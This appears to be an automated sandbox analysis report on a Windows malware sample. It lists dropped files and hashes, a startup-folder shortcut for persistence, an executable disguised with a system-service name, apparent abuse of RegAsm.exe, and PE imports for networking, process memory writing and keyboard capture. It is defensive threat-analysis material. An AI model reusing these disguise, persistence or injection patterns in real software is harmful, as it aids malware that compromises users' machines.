                                                                                          Category:dropped
                                                                                          Size (bytes):53248
                                                                                          Entropy (8bit):4.490095782293901
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:0P2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2wTFRJS8Ulg:HJv46yoD2BTNz1+M9GLfOw8UO
                                                                                          MD5:529695608EAFBED00ACA9E61EF333A7C
                                                                                          SHA1:68CA8B6D8E74FA4F4EE603EB862E36F2A73BC1E5
                                                                                          SHA-256:44F129DE312409D8A2DF55F655695E1D48D0DB6F20C5C7803EB0032D8E6B53D0
                                                                                          SHA-512:8FE476E0185B2B0C66F34E51899B932CB35600C753D36FE102BDA5894CDAA58410044E0A30FDBEF76A285C2C75018D7C5A9BA0763D45EC605C2BBD1EBB9ED674
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: Metadefender, Detection: 0%
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Reputation:moderate, very likely benign file
                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):525
                                                                                          Entropy (8bit):5.2874233355119316
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                                                          MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                                                          SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                                                          SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                                                          SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):20
                                                                                          Entropy (8bit):3.6841837197791887
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:QHXMKas:Q3Las
                                                                                          MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                                                                          SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                                                                          SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                                                                          SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: 1,"fusion","GAC",0..
                                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8
                                                                                          Entropy (8bit):3.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:E+D9t:EC
                                                                                          MD5:71E7E5A952207AD4C834CB50F9196BF5
                                                                                          SHA1:67B0CB7D231B6150B1E3B9EF7956CCF78323C602
                                                                                          SHA-256:D582023DF0402BFBC4DC155D133389866BDD68811EC682ACFADAB8B04E971848
                                                                                          SHA-512:A69BCFF8AD1CAC8AE06C25742AD00C2B3C6132E778B25A3A79A3568F18B6CEA67ABC78178435930361764DC9F754963226E4DB5C097386E282E5BBD8BBC51D86
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview: Y0..p..H
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk
                                                                                          Process:C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 19 08:52:25 2020, mtime=Thu Nov 19 08:52:25 2020, atime=Thu Nov 19 08:52:25 2020, length=1124896, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):1053
                                                                                          Entropy (8bit):5.04565390227356
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:84W1y4GL4OkwCgUCI0J5RPIqsFwojEjAJmhy52t6RPIqsFw2wuLYch44t2Y+xIBx:84QGLIwrhnHNsQAJgE2t6N2xw7aB6m
                                                                                          MD5:DA2663B8526516E9BC52B90858834764
                                                                                          SHA1:9F97A2B56820D1783EE72F46337F72D9A62854D0
                                                                                          SHA-256:441121ACEBD6A0F3D3D3EFDD951C5006C5F00D47F727DF64E0D5222E3A35B49E
                                                                                          SHA-512:40AB2E91FC2D984B582433F394369BC2157F4172E18C311AFF14D7FAC59E5A8EDB1603273534B1F086F8C026641CC8A9FA49EE67B816E24F0148D33D7B4EE4C7
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
                                                                                          Process:C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1124896
                                                                                          Entropy (8bit):7.082489952218431
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:7qybFRXWsNAxCA9dpftQyNE12mHanc5vuZoX2lPA5o:bRWCoBQAEgYanc5vmo2uo
                                                                                          MD5:E10CD6FAB33374FB1A0002F89D0BFE45
                                                                                          SHA1:FF0DA20AEB8161B6053C800D2F68BDD34CCECA58
                                                                                          SHA-256:B5894CBBC3810CD2BB086AE75D02D8A3B84FA370FC8F5EEE4967C99D82D2DD69
                                                                                          SHA-512:93E8D12CC55182C93DE23DE49078CD0596C334C5F796AABC02107AF99B7369EC30DB610F229A974C276757F959F65352B583A951ED1F7CE52CCA7F30A11962FB
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          Reputation:low
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L......\.........."..........@....................@.................................p.....@...@.......@.........................|........|......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....|.......~...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                                                          \Device\ConDrv
                                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1010
                                                                                          Entropy (8bit):4.298581893109255
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:zKTDwL/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zKTDwAXZxo4ABV+SrUYE
                                                                                          MD5:367EEEC425FE7E80B723298C447E2F22
                                                                                          SHA1:3873DFC88AF504FF79231FE2BF0E3CD93CE45195
                                                                                          SHA-256:481A7A3CA0DD32DA4772718BA4C1EF3F01E8D184FE82CF6E9C5386FD343264BC
                                                                                          SHA-512:F7101541D87F045E9DBC45941CDC5A7F97F3EFC29AC0AF2710FC24FA64F0163F9463DE373A5D2BE1270126829DE81006FB8E764186374966E8D0E9BB35B7D7D6
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.8922..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information.. /? or /help Display this usage

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.082492111436444
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:e5bd3238d220c97cd4d6969abb3b33e0.exe
                                                                                          File size:1124888
                                                                                          MD5:7b00ed250c793c95f4d98c637302fb6f
                                                                                          SHA1:7f8d0c101fa8c5e875aa76c9a9c139d8800867b3
                                                                                          SHA256:5108996bad93e37f7f6e003be1edf9dba10a99fafc3894f8d4fd01226e10b0a5
                                                                                          SHA512:dfb155952d9da0b0dffebe232de3e6dbf1fb130cdfb32569a2e3272634a15f42b9a04036c8d796a47e031a7f8c841e25f502df3a86b151d313a7a0fc5ef4768a
                                                                                          SSDEEP:24576:7qybFRXWsNAxCA9dpftQyNE12mHanc5vuZoX2lPA5K:bRWCoBQAEgYanc5vmo2uK
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                                                          File Icon

                                                                                          Icon Hash:aab2e3e39383aa00

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x42800a
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                                                          Time Stamp:0x5CF3C8E6 [Sun Jun 2 13:02:30 2019 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          call 00007F6DA0CF531Dh
                                                                                          jmp 00007F6DA0CE80D4h
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          push edi
                                                                                          push esi
                                                                                          mov esi, dword ptr [esp+10h]
                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                          push ecx
                                                                                          pop eax
                                                                                          push ecx
                                                                                          pop edx
                                                                                          add eax, esi
                                                                                          cmp edi, esi
                                                                                          jbe 00007F6DA0CE825Ah
                                                                                          cmp edi, eax
                                                                                          jc 00007F6DA0CE85BEh
                                                                                          bt dword ptr [004C41FCh], 01h
                                                                                          jnc 00007F6DA0CE8259h
                                                                                          rep movsb
                                                                                          jmp 00007F6DA0CE856Ch
                                                                                          cmp ecx, 00000080h
                                                                                          jc 00007F6DA0CE8424h
                                                                                          push edi
                                                                                          pop eax
                                                                                          xor eax, esi
                                                                                          test eax, 0000000Fh
                                                                                          jne 00007F6DA0CE8260h
                                                                                          bt dword ptr [004BF324h], 01h
                                                                                          jc 00007F6DA0CE8730h
                                                                                          bt dword ptr [004C41FCh], 00000000h
                                                                                          jnc 00007F6DA0CE83FDh
                                                                                          test edi, 00000003h
                                                                                          jne 00007F6DA0CE840Eh
                                                                                          test esi, 00000003h
                                                                                          jne 00007F6DA0CE83EDh
                                                                                          bt edi, 02h
                                                                                          jnc 00007F6DA0CE825Fh
                                                                                          mov eax, dword ptr [esi]
                                                                                          sub ecx, 04h
                                                                                          lea esi, dword ptr [esi+04h]
                                                                                          mov dword ptr [edi], eax
                                                                                          lea edi, dword ptr [edi+04h]
                                                                                          bt edi, 03h
                                                                                          jnc 00007F6DA0CE8263h
                                                                                          movq xmm1, qword ptr [esi]
                                                                                          sub ecx, 08h
                                                                                          lea esi, dword ptr [esi+08h]
                                                                                          movq qword ptr [edi], xmm1
                                                                                          lea edi, dword ptr [edi+08h]
                                                                                          test esi, 00000007h
                                                                                          je 00007F6DA0CE82B5h
                                                                                          bt esi, 03h

                                                                                          Rich Headers

                                                                                          Programming Language:
                                                                                          • [ C ] VS2013 build 21005
                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                          • [LNK] VS2013 UPD5 build 40629
                                                                                          • [ASM] VS2013 UPD5 build 40629
                                                                                          • [C++] VS2013 build 21005
                                                                                          • [ASM] VS2013 build 21005
                                                                                          • [RES] VS2013 build 21005
                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                          Data Directories

                                                                                          Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT          0xbc0cc          0x17c         .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc8000          0x47cbc       .rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0x110000         0x7134        .reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG           0x92bc0          0x1c          .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa4b50          0x40          .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT             0x8f000          0x884         .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                          Sections

                                                                                          Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                                          .text   0x1000           0x8dfdd       0x8e000   False     0.583319005832   data       6.71971878034  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rdata  0x8f000          0x2fd8e       0x2fe00   False     0.328288185379   data       5.76324400576  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data   0xbf000          0x8f74        0x5200    False     0.10175304878    data       1.19638192355  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc   0xc8000          0x47cbc       0x47e00   False     0.908023097826   data       7.84935069972  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc  0x110000         0x7134        0x7200    False     0.761753015351   data       6.78395555713  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          Name           RVA       Size     Type                                                       Language  Country
                                                                                          RT_ICON        0xc85e8   0x128    GLS_BINARY_LSB_FIRST                                       English   Great Britain
                                                                                          RT_ICON        0xc8710   0x128    GLS_BINARY_LSB_FIRST                                       English   Great Britain
                                                                                          RT_ICON        0xc8838   0x128    GLS_BINARY_LSB_FIRST                                       English   Great Britain
                                                                                          RT_ICON        0xc8960   0x2e8    data                                                       English   Great Britain
                                                                                          RT_ICON        0xc8c48   0x128    GLS_BINARY_LSB_FIRST                                       English   Great Britain
                                                                                          RT_ICON        0xc8d70   0xea8    data                                                       English   Great Britain
                                                                                          RT_ICON        0xc9c18   0x8a8    dBase III DBT, version number 0, next free block index 40  English   Great Britain
                                                                                          RT_ICON        0xca4c0   0x568    GLS_BINARY_LSB_FIRST                                       English   Great Britain
                                                                                          RT_ICON        0xcaa28   0x25a8   dBase III DBT, version number 0, next free block index 40  English   Great Britain
                                                                                          RT_ICON        0xccfd0   0x10a8   data                                                       English   Great Britain
                                                                                          RT_ICON        0xce078   0x468    GLS_BINARY_LSB_FIRST                                       English   Great Britain
                                                                                          RT_MENU        0xce4e0   0x50     data                                                       English   Great Britain
                                                                                          RT_STRING      0xce530   0x594    data                                                       English   Great Britain
                                                                                          RT_STRING      0xceac4   0x68a    data                                                       English   Great Britain
                                                                                          RT_STRING      0xcf150   0x490    data                                                       English   Great Britain
                                                                                          RT_STRING      0xcf5e0   0x5fc    data                                                       English   Great Britain
                                                                                          RT_STRING      0xcfbdc   0x65c    data                                                       English   Great Britain
                                                                                          RT_STRING      0xd0238   0x466    data                                                       English   Great Britain
                                                                                          RT_STRING      0xd06a0   0x158    data                                                       English   Great Britain
                                                                                          RT_RCDATA      0xd07f8   0x2bef0  data
                                                                                          RT_RCDATA      0xfc6e8   0x13052  data
                                                                                          RT_GROUP_ICON  0x10f73c  0x76     data                                                       English   Great Britain
                                                                                          RT_GROUP_ICON  0x10f7b4  0x14     data                                                       English   Great Britain
                                                                                          RT_GROUP_ICON  0x10f7c8  0x14     data                                                       English   Great Britain
                                                                                          RT_GROUP_ICON  0x10f7dc  0x14     data                                                       English   Great Britain
                                                                                          RT_VERSION     0x10f7f0  0xdc     data                                                       English   Great Britain
                                                                                          RT_MANIFEST    0x10f8cc  0x3ef    ASCII text, with CRLF line terminators                     English   Great Britain

                                                                                          Imports

                                                                                          DLLImport
                                                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                          UxTheme.dllIsThemeActive
                                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, 
GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description | Data
Translation | 0x0809 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | Great Britain

Static AutoIT Info

General

Code:
